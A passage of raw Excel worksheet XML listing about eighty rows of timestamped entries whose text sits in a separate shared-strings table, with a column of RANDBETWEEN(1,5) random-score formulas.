      </c>
      <c r="E28781" s="2" t="s">
        <v>26229</v>
      </c>
      <c r="F28781">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28782" s="1">
        <v>42838.593368055554</v>
      </c>
      <c r="C28782" t="s">
        <v>10</v>
      </c>
      <c r="D28782" t="s">
        <v>36</v>
      </c>
      <c r="E28782" t="s">
        <v>26230</v>
      </c>
      <c r="F28782">
        <f t="shared" ca="1" si="449"/>
        <v>4</v>
      </c>
    </row>
    <row r="28783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28783" s="1">
        <v>42838.58834490741</v>
      </c>
      <c r="C28783" t="s">
        <v>10</v>
      </c>
      <c r="D28783" t="s">
        <v>52</v>
      </c>
      <c r="E28783" t="s">
        <v>26231</v>
      </c>
      <c r="F28783">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28784" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28784" s="1">
        <v>42838.564953703702</v>
      </c>
      <c r="C28784" t="s">
        <v>10</v>
      </c>
      <c r="D28784" t="s">
        <v>192</v>
      </c>
      <c r="E28784" s="2" t="s">
        <v>26232</v>
      </c>
      <c r="F28784">
        <f t="shared" ca="1" si="449"/>
        <v>2</v>
      </c>
    </row>
    <row r="28785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28785" s="1">
        <v>42838.527754629627</v>
      </c>
      <c r="C28785" t="s">
        <v>10</v>
      </c>
      <c r="D28785" t="s">
        <v>271</v>
      </c>
      <c r="E28785" t="s">
        <v>26233</v>
      </c>
      <c r="F28785">
        <f t="shared" ca="1" si="449"/>
        <v>4</v>
      </c>
    </row>
    <row r="28786" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28786" s="1">
        <v>42838.526678240742</v>
      </c>
      <c r="C28786" t="s">
        <v>10</v>
      </c>
      <c r="D28786" t="s">
        <v>178</v>
      </c>
      <c r="E28786" s="2" t="s">
        <v>26234</v>
      </c>
      <c r="F28786">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28787" s="1">
        <v>42838.520902777775</v>
      </c>
      <c r="C28787" t="s">
        <v>314</v>
      </c>
      <c r="E28787" t="s">
        <v>26235</v>
      </c>
      <c r="F28787">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28788" s="1">
        <v>42838.483773148146</v>
      </c>
      <c r="C28788" t="s">
        <v>10</v>
      </c>
      <c r="D28788" t="s">
        <v>39</v>
      </c>
      <c r="E28788" t="s">
        <v>26236</v>
      </c>
      <c r="F28788">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28789" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A28789" s="1">
        <v>42838.453043981484</v>
      </c>
      <c r="C28789" t="s">
        <v>41</v>
      </c>
      <c r="E28789" s="2" t="s">
        <v>26237</v>
      </c>
      <c r="F28789">
        <f t="shared" ca="1" si="449"/>
        <v>4</v>
      </c>
    </row>
    <row r="28790" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28790" s="1">
        <v>42838.442858796298</v>
      </c>
      <c r="C28790" t="s">
        <v>1130</v>
      </c>
      <c r="E28790" s="2" t="s">
        <v>26238</v>
      </c>
      <c r="F28790">
        <f t="shared" ca="1" si="449"/>
        <v>2</v>
      </c>
    </row>
    <row r="28791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28791" s="1">
        <v>42838.440335648149</v>
      </c>
      <c r="C28791" t="s">
        <v>6</v>
      </c>
      <c r="D28791" t="s">
        <v>7</v>
      </c>
      <c r="E28791" t="s">
        <v>26239</v>
      </c>
      <c r="F28791">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28792" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A28792" s="1">
        <v>42838.421388888892</v>
      </c>
      <c r="C28792" t="s">
        <v>48</v>
      </c>
      <c r="E28792" s="2" t="s">
        <v>26240</v>
      </c>
      <c r="F28792">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28793" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28793" s="1">
        <v>42838.374386574076</v>
      </c>
      <c r="C28793" t="s">
        <v>48</v>
      </c>
      <c r="E28793" s="2" t="s">
        <v>26241</v>
      </c>
      <c r="F28793">
        <f t="shared" ca="1" si="449"/>
        <v>4</v>
      </c>
    </row>
    <row r="28794" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28794" s="1">
        <v>42838.367534722223</v>
      </c>
      <c r="C28794" t="s">
        <v>461</v>
      </c>
      <c r="E28794" s="2" t="s">
        <v>26242</v>
      </c>
      <c r="F28794">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28795" s="1">
        <v>42838.361296296294</v>
      </c>
      <c r="C28795" t="s">
        <v>10</v>
      </c>
      <c r="D28795" t="s">
        <v>178</v>
      </c>
      <c r="E28795" t="s">
        <v>26243</v>
      </c>
      <c r="F28795">
        <f t="shared" ca="1" si="449"/>
        <v>5</v>
      </c>
    </row>
    <row r="28796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28796" s="1">
        <v>42838.320162037038</v>
      </c>
      <c r="C28796" t="s">
        <v>10</v>
      </c>
      <c r="D28796" t="s">
        <v>271</v>
      </c>
      <c r="E28796" t="s">
        <v>26244</v>
      </c>
      <c r="F28796">
        <f t="shared" ca="1" si="449"/>
        <v>3</v>
      </c>
    </row>
    <row r="28797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28797" s="1">
        <v>42838.260046296295</v>
      </c>
      <c r="C28797" t="s">
        <v>71</v>
      </c>
      <c r="E28797" t="s">
        <v>26245</v>
      </c>
      <c r="F28797">
        <f t="shared" ca="1" si="449"/>
        <v>4</v>
      </c>
    </row>
    <row r="28798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28798" s="1">
        <v>42838.248611111114</v>
      </c>
      <c r="C28798" t="s">
        <v>73</v>
      </c>
      <c r="E28798" t="s">
        <v>26246</v>
      </c>
      <c r="F28798">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28799" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28799" s="1">
        <v>42838.245995370373</v>
      </c>
      <c r="C28799" t="s">
        <v>124</v>
      </c>
      <c r="E28799" s="2" t="s">
        <v>26247</v>
      </c>
      <c r="F28799">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28800" s="1">
        <v>42838.212002314816</v>
      </c>
      <c r="C28800" t="s">
        <v>73</v>
      </c>
      <c r="E28800" t="s">
        <v>26248</v>
      </c>
      <c r="F28800">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28801" s="1">
        <v>42838.211608796293</v>
      </c>
      <c r="C28801" t="s">
        <v>41</v>
      </c>
      <c r="E28801" t="s">
        <v>26249</v>
      </c>
      <c r="F28801">
        <f t="shared" ca="1" si="449"/>
        <v>1</v>
      </c>
    </row>
    <row r="28802" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A28802" s="1">
        <v>42838.121041666665</v>
      </c>
      <c r="C28802" t="s">
        <v>41</v>
      </c>
      <c r="E28802" s="2" t="s">
        <v>26250</v>
      </c>
      <c r="F28802">
        <f t="shared" ref="F28802:F28865" ca="1" si="450">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="28803" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28803" s="1">
        <v>42838.10229166667</v>
      </c>
      <c r="C28803" t="s">
        <v>430</v>
      </c>
      <c r="E28803" s="2" t="s">
        <v>26251</v>
      </c>
      <c r="F28803">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28804" s="1">
        <v>42838.000659722224</v>
      </c>
      <c r="C28804" t="s">
        <v>10</v>
      </c>
      <c r="D28804" t="s">
        <v>36</v>
      </c>
      <c r="E28804" t="s">
        <v>26252</v>
      </c>
      <c r="F28804">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28805" s="1">
        <v>42837.991967592592</v>
      </c>
      <c r="C28805" t="s">
        <v>10</v>
      </c>
      <c r="D28805" t="s">
        <v>6</v>
      </c>
      <c r="E28805" t="s">
        <v>26253</v>
      </c>
      <c r="F28805">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28806" s="1">
        <v>42837.985601851855</v>
      </c>
      <c r="C28806" t="s">
        <v>10</v>
      </c>
      <c r="D28806" t="s">
        <v>80</v>
      </c>
      <c r="E28806" t="s">
        <v>26254</v>
      </c>
      <c r="F28806">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28807" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28807" s="1">
        <v>42837.927627314813</v>
      </c>
      <c r="C28807" t="s">
        <v>4060</v>
      </c>
      <c r="E28807" s="2" t="s">
        <v>26255</v>
      </c>
      <c r="F28807">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28808" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28808" s="1">
        <v>42837.900763888887</v>
      </c>
      <c r="C28808" t="s">
        <v>6</v>
      </c>
      <c r="D28808" t="s">
        <v>194</v>
      </c>
      <c r="E28808" s="2" t="s">
        <v>26256</v>
      </c>
      <c r="F28808">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28809" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28809" s="1">
        <v>42837.892245370371</v>
      </c>
      <c r="C28809" t="s">
        <v>140</v>
      </c>
      <c r="D28809" t="s">
        <v>847</v>
      </c>
      <c r="E28809" s="2" t="s">
        <v>26257</v>
      </c>
      <c r="F28809">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28810" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28810" s="1">
        <v>42837.884421296294</v>
      </c>
      <c r="C28810" t="s">
        <v>408</v>
      </c>
      <c r="E28810" s="2" t="s">
        <v>26258</v>
      </c>
      <c r="F28810">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28811" s="1">
        <v>42837.849675925929</v>
      </c>
      <c r="C28811" t="s">
        <v>10</v>
      </c>
      <c r="D28811" t="s">
        <v>11</v>
      </c>
      <c r="E28811" t="s">
        <v>26259</v>
      </c>
      <c r="F28811">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28812" s="1">
        <v>42837.833402777775</v>
      </c>
      <c r="C28812" t="s">
        <v>10</v>
      </c>
      <c r="D28812" t="s">
        <v>17</v>
      </c>
      <c r="E28812" t="s">
        <v>26260</v>
      </c>
      <c r="F28812">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28813" s="1">
        <v>42837.811168981483</v>
      </c>
      <c r="C28813" t="s">
        <v>10</v>
      </c>
      <c r="D28813" t="s">
        <v>6</v>
      </c>
      <c r="E28813" t="s">
        <v>26261</v>
      </c>
      <c r="F28813">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28814" s="1">
        <v>42837.782731481479</v>
      </c>
      <c r="C28814" t="s">
        <v>10</v>
      </c>
      <c r="D28814" t="s">
        <v>6</v>
      </c>
      <c r="E28814" t="s">
        <v>26262</v>
      </c>
      <c r="F28814">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28815" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28815" s="1">
        <v>42837.777800925927</v>
      </c>
      <c r="C28815" t="s">
        <v>6</v>
      </c>
      <c r="D28815" t="s">
        <v>25</v>
      </c>
      <c r="E28815" s="2" t="s">
        <v>26263</v>
      </c>
      <c r="F28815">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28816" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28816" s="1">
        <v>42837.758483796293</v>
      </c>
      <c r="C28816" t="s">
        <v>10</v>
      </c>
      <c r="D28816" t="s">
        <v>374</v>
      </c>
      <c r="E28816" s="2" t="s">
        <v>26264</v>
      </c>
      <c r="F28816">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28817" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28817" s="1">
        <v>42837.727314814816</v>
      </c>
      <c r="C28817" t="s">
        <v>10</v>
      </c>
      <c r="D28817" t="s">
        <v>1056</v>
      </c>
      <c r="E28817" s="2" t="s">
        <v>26265</v>
      </c>
      <c r="F28817">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28818" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28818" s="1">
        <v>42837.708587962959</v>
      </c>
      <c r="C28818" t="s">
        <v>16</v>
      </c>
      <c r="E28818" s="2" t="s">
        <v>26266</v>
      </c>
      <c r="F28818">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28819" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28819" s="1">
        <v>42837.706562500003</v>
      </c>
      <c r="C28819" t="s">
        <v>10</v>
      </c>
      <c r="D28819" t="s">
        <v>290</v>
      </c>
      <c r="E28819" s="2" t="s">
        <v>26267</v>
      </c>
      <c r="F28819">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28820" s="1">
        <v>42837.679189814815</v>
      </c>
      <c r="C28820" t="s">
        <v>10</v>
      </c>
      <c r="D28820" t="s">
        <v>39</v>
      </c>
      <c r="E28820" t="s">
        <v>26268</v>
      </c>
      <c r="F28820">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28821" s="1">
        <v>42837.635497685187</v>
      </c>
      <c r="C28821" t="s">
        <v>10</v>
      </c>
      <c r="D28821" t="s">
        <v>41</v>
      </c>
      <c r="E28821" t="s">
        <v>26269</v>
      </c>
      <c r="F28821">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28822" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28822" s="1">
        <v>42837.591817129629</v>
      </c>
      <c r="C28822" t="s">
        <v>10</v>
      </c>
      <c r="D28822" t="s">
        <v>494</v>
      </c>
      <c r="E28822" s="2" t="s">
        <v>26270</v>
      </c>
      <c r="F28822">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28823" s="1">
        <v>42837.591724537036</v>
      </c>
      <c r="C28823" t="s">
        <v>10</v>
      </c>
      <c r="D28823" t="s">
        <v>36</v>
      </c>
      <c r="E28823" t="s">
        <v>26271</v>
      </c>
      <c r="F28823">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28824" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A28824" s="1">
        <v>42837.587314814817</v>
      </c>
      <c r="C28824" t="s">
        <v>10</v>
      </c>
      <c r="D28824" t="s">
        <v>367</v>
      </c>
      <c r="E28824" s="2" t="s">
        <v>26272</v>
      </c>
      <c r="F28824">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28825" s="1">
        <v>42837.574965277781</v>
      </c>
      <c r="C28825" t="s">
        <v>10</v>
      </c>
      <c r="D28825" t="s">
        <v>52</v>
      </c>
      <c r="E28825" t="s">
        <v>26273</v>
      </c>
      <c r="F28825">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28826" s="1">
        <v>42837.571585648147</v>
      </c>
      <c r="C28826" t="s">
        <v>10</v>
      </c>
      <c r="D28826" t="s">
        <v>46</v>
      </c>
      <c r="E28826" t="s">
        <v>26274</v>
      </c>
      <c r="F28826">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28827" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28827" s="1">
        <v>42837.558935185189</v>
      </c>
      <c r="C28827" t="s">
        <v>10</v>
      </c>
      <c r="D28827" t="s">
        <v>112</v>
      </c>
      <c r="E28827" s="2" t="s">
        <v>26275</v>
      </c>
      <c r="F28827">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28828" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28828" s="1">
        <v>42837.547199074077</v>
      </c>
      <c r="C28828" t="s">
        <v>10</v>
      </c>
      <c r="D28828" t="s">
        <v>163</v>
      </c>
      <c r="E28828" s="2" t="s">
        <v>26276</v>
      </c>
      <c r="F28828">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28829" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28829" s="1">
        <v>42837.496990740743</v>
      </c>
      <c r="C28829" t="s">
        <v>260</v>
      </c>
      <c r="E28829" s="2" t="s">
        <v>26277</v>
      </c>
      <c r="F28829">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28830" s="1">
        <v>42837.494756944441</v>
      </c>
      <c r="C28830" t="s">
        <v>10</v>
      </c>
      <c r="D28830" t="s">
        <v>20</v>
      </c>
      <c r="E28830" t="s">
        <v>26278</v>
      </c>
      <c r="F28830">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28831" s="1">
        <v>42837.481481481482</v>
      </c>
      <c r="C28831" t="s">
        <v>48</v>
      </c>
      <c r="E28831" t="s">
        <v>26279</v>
      </c>
      <c r="F28831">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28832" s="1">
        <v>42837.462199074071</v>
      </c>
      <c r="C28832" t="s">
        <v>10</v>
      </c>
      <c r="D28832" t="s">
        <v>23</v>
      </c>
      <c r="E28832" t="s">
        <v>26280</v>
      </c>
      <c r="F28832">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28833" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28833" s="1">
        <v>42837.443923611114</v>
      </c>
      <c r="C28833" t="s">
        <v>10</v>
      </c>
      <c r="D28833" t="s">
        <v>17</v>
      </c>
      <c r="E28833" s="2" t="s">
        <v>26281</v>
      </c>
      <c r="F28833">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28834" s="1">
        <v>42837.437824074077</v>
      </c>
      <c r="C28834" t="s">
        <v>10</v>
      </c>
      <c r="D28834" t="s">
        <v>158</v>
      </c>
      <c r="E28834" t="s">
        <v>26282</v>
      </c>
      <c r="F28834">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28835" s="1">
        <v>42837.420891203707</v>
      </c>
      <c r="C28835" t="s">
        <v>10</v>
      </c>
      <c r="D28835" t="s">
        <v>36</v>
      </c>
      <c r="E28835" t="s">
        <v>26283</v>
      </c>
      <c r="F28835">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28836" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28836" s="1">
        <v>42837.41615740741</v>
      </c>
      <c r="C28836" t="s">
        <v>65</v>
      </c>
      <c r="E28836" s="2" t="s">
        <v>26284</v>
      </c>
      <c r="F28836">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28837" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28837" s="1">
        <v>42837.40697916667</v>
      </c>
      <c r="C28837" t="s">
        <v>10</v>
      </c>
      <c r="D28837" t="s">
        <v>192</v>
      </c>
      <c r="E28837" s="2" t="s">
        <v>26285</v>
      </c>
      <c r="F28837">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28838" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A28838" s="1">
        <v>42837.405821759261</v>
      </c>
      <c r="C28838" t="s">
        <v>10</v>
      </c>
      <c r="D28838" t="s">
        <v>36</v>
      </c>
      <c r="E28838" s="2" t="s">
        <v>26286</v>
      </c>
      <c r="F28838">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28839" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28839" s="1">
        <v>42837.405393518522</v>
      </c>
      <c r="C28839" t="s">
        <v>10</v>
      </c>
      <c r="D28839" t="s">
        <v>192</v>
      </c>
      <c r="E28839" s="2" t="s">
        <v>26285</v>
      </c>
      <c r="F28839">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28840" s="1">
        <v>42837.400150462963</v>
      </c>
      <c r="C28840" t="s">
        <v>319</v>
      </c>
      <c r="F28840">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28841" s="1">
        <v>42837.366099537037</v>
      </c>
      <c r="C28841" t="s">
        <v>41</v>
      </c>
      <c r="E28841" t="s">
        <v>26287</v>
      </c>
      <c r="F28841">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28842" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28842" s="1">
        <v>42837.35261574074</v>
      </c>
      <c r="C28842" t="s">
        <v>65</v>
      </c>
      <c r="E28842" s="2" t="s">
        <v>26288</v>
      </c>
      <c r="F28842">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28843" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A28843" s="1">
        <v>42837.348425925928</v>
      </c>
      <c r="C28843" t="s">
        <v>6</v>
      </c>
      <c r="D28843" t="s">
        <v>25</v>
      </c>
      <c r="E28843" s="2" t="s">
        <v>26289</v>
      </c>
      <c r="F28843">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28844" s="1">
        <v>42837.344259259262</v>
      </c>
      <c r="C28844" t="s">
        <v>1931</v>
      </c>
      <c r="E28844" t="s">
        <v>26290</v>
      </c>
      <c r="F28844">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28845" s="1">
        <v>42837.331631944442</v>
      </c>
      <c r="C28845" t="s">
        <v>48</v>
      </c>
      <c r="F28845">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28846" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28846" s="1">
        <v>42837.328287037039</v>
      </c>
      <c r="C28846" t="s">
        <v>10</v>
      </c>
      <c r="D28846" t="s">
        <v>23</v>
      </c>
      <c r="E28846" s="2" t="s">
        <v>26291</v>
      </c>
      <c r="F28846">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28847" s="1">
        <v>42837.320613425924</v>
      </c>
      <c r="C28847" t="s">
        <v>71</v>
      </c>
      <c r="E28847" t="s">
        <v>26292</v>
      </c>
      <c r="F28847">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28848" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A28848" s="1">
        <v>42837.287256944444</v>
      </c>
      <c r="C28848" t="s">
        <v>48</v>
      </c>
      <c r="E28848" s="2" t="s">
        <v>26293</v>
      </c>
      <c r="F28848">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28849" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A28849" s="1">
        <v>42837.272337962961</v>
      </c>
      <c r="C28849" t="s">
        <v>41</v>
      </c>
      <c r="E28849" s="2" t="s">
        <v>26294</v>
      </c>
      <c r="F28849">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28850" s="1">
        <v>42837.267175925925</v>
      </c>
      <c r="C28850" t="s">
        <v>50</v>
      </c>
      <c r="E28850" t="s">
        <v>26295</v>
      </c>
      <c r="F28850">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28851" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28851" s="1">
        <v>42837.242407407408</v>
      </c>
      <c r="C28851" t="s">
        <v>48</v>
      </c>
      <c r="E28851" s="2" t="s">
        <v>26296</v>
      </c>
      <c r="F28851">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28852" s="1">
        <v>42837.237407407411</v>
      </c>
      <c r="C28852" t="s">
        <v>71</v>
      </c>
      <c r="E28852" t="s">
        <v>26297</v>
      </c>
      <c r="F28852">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28853" s="1">
        <v>42837.229004629633</v>
      </c>
      <c r="C28853" t="s">
        <v>60</v>
      </c>
      <c r="E28853" t="s">
        <v>26298</v>
      </c>
      <c r="F28853">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28854" s="1">
        <v>42837.227708333332</v>
      </c>
      <c r="C28854" t="s">
        <v>410</v>
      </c>
      <c r="E28854" t="s">
        <v>26299</v>
      </c>
      <c r="F28854">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28855" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28855" s="1">
        <v>42837.222650462965</v>
      </c>
      <c r="C28855" t="s">
        <v>559</v>
      </c>
      <c r="E28855" s="2" t="s">
        <v>26300</v>
      </c>
      <c r="F28855">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28856" s="1">
        <v>42837.147534722222</v>
      </c>
      <c r="C28856" t="s">
        <v>724</v>
      </c>
      <c r="E28856" t="s">
        <v>26301</v>
      </c>
      <c r="F28856">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28857" s="1">
        <v>42837.142523148148</v>
      </c>
      <c r="C28857" t="s">
        <v>41</v>
      </c>
      <c r="E28857" t="s">
        <v>26302</v>
      </c>
      <c r="F28857">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28858" s="1">
        <v>42837.122916666667</v>
      </c>
      <c r="C28858" t="s">
        <v>139</v>
      </c>
      <c r="F28858">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28859" s="1">
        <v>42837.117638888885</v>
      </c>
      <c r="C28859" t="s">
        <v>71</v>
      </c>
      <c r="E28859" t="s">
        <v>26303</v>
      </c>
      <c r="F28859">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28860" s="1">
        <v>42837.101921296293</v>
      </c>
      <c r="C28860" t="s">
        <v>41</v>
      </c>
      <c r="E28860" t="s">
        <v>26304</v>
      </c>
      <c r="F28860">
        <f t="shared" ca="1" si="450"/>
